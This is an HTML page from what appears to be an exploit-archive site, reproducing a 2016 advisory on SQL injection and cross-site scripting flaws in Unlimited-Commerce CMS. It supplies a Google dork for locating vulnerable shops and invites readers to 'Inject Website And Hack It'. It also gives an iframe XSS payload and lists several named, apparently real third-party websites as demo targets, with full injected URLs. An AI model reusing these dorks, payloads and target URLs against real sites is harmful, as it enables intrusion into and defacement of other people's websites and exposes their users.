<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-38</title>
    </head>
    <body>
        <center>
                <a  href="exploit-38" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
* Title: Unlimited-Commerce Cms Multiple Vulnerability
* date: 25/4/2016
* Exploit Author : Guardiran Security Team
* Google Dork: intext:\&quot;Shopsoftware 2009-2010 by Unlimited-Commerce.de\&quot;
* Vendor Homepage: http://www.unlimited-commerce.de/
* Version : All Version
* Tested On : Kali Linux / Windows 8.1

HEllo Guys.
This Is a Multiple Vulnerability ( Xss &amp; Sqli )

------------------

SQL INJECTION :

insert \&quot; or \' After PATCH URL To Give The MYSQL Error.
Then You Can User The Command SQL Injection To Inject Website And Hack It.

Demo :

http://durchfahrt.de/cms_pages.php?pn=Datenschutz%27
http://www.adels-archiv.com/shop/showcatrows.php?CategoryID=2&amp;SubcategoryID=5%27
http://media.starclubmusic.de/showcatrows.php?CategoryID=12&amp;SubcategoryID=13%27

XSS:

This CMS And Also Have Xss Vulnerability.
We Cnd Run Our Javacode In site.
Payload: \'&gt;&lt;iframe src=\&quot;http://guardiran.org/forums\&quot; width=\&quot;450\&quot; height=\&quot;200\&quot;&gt;&lt;/iframe&gt;

Demo:
http://durchfahrt.de/cms_pages.php?pn=Datenschutz%27%3E%3Ciframe%20src=%22http://guardiran.org/forums%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
http://www.download-by-zet.de/cms_pages.php?pn=Widerrufsbelehrung%27%3E%3Ciframe%20src=%22http://guardiran.org/forums%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
http://media.starclubmusic.de/showcatrows.php?CategoryID=12&amp;SubcategoryID=13%27%3E%3Ciframe%20src=%22http://guardiran.org/forums%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E
http://www.adels-archiv.com/shop/showcatrows.php?CategoryID=2&amp;SubcategoryID=5%27%3E%3Ciframe%20src=%22http://guardiran.org/forums%22%20width=%22450%22%20height=%22200%22%3E%3C/iframe%3E

* Special Tnx : cod3!nj3ct!0n , REX , alizombie , DR.GrYgHoN , MR.IMAN , reza attacker
* Discovered By : MR.IMAN
* We Are Guardiran Security Team        </pre>
    </body>
</html>